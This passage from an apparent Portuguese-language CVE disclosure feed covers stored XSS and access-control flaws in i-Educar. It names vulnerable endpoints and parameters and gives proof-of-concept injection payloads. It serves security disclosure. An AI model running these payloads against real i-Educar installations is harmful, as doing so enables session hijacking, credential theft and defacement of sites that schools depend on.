&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10372</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10372/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10372/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10372-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_modulo_cadphp&amp;#34;&amp;gt;CVE-2025-10372: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_modulo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10372-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_modulo_cadphp&amp;#34;&amp;gt;CVE-2025-10372: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_modulo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10372/image.png&amp;#34;
	width=&amp;#34;583&amp;#34;
	height=&amp;#34;230&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10372/image_hu_11b4ec969d3cf5a8.png 480w, /p/cve-2025-10372/image_hu_280822500865c396.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;253&amp;#34;
		data-flex-basis=&amp;#34;608px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10372/image-1.png&amp;#34;
	width=&amp;#34;572&amp;#34;
	height=&amp;#34;231&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10372/image-1_hu_372cc54d6686bae9.png 480w, /p/cve-2025-10372/image-1_hu_69fa88ac3e05bf85.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;247&amp;#34;
		data-flex-basis=&amp;#34;594px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 13 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10373</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10373/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10373/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10373-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_cadphp-parâmetro-nm_tipo&amp;#34;&amp;gt;CVE-2025-10373: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_turma_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10373-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_cadphp-parâmetro-nm_tipo&amp;#34;&amp;gt;CVE-2025-10373: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_turma_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10373/image.png&amp;#34;
	width=&amp;#34;560&amp;#34;
	height=&amp;#34;214&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10373/image_hu_74dab14fb73dfe41.png 480w, /p/cve-2025-10373/image_hu_76923e2a7dc46c82.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;628px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 13 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10070</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10070/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10070/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10070-controle-de-acesso-quebrado-no-endpoint-enturmacao-em-loteid&amp;#34;&amp;gt;CVE-2025-10070: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10070-controle-de-acesso-quebrado-no-endpoint-enturmacao-em-loteid&amp;#34;&amp;gt;CVE-2025-10070: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
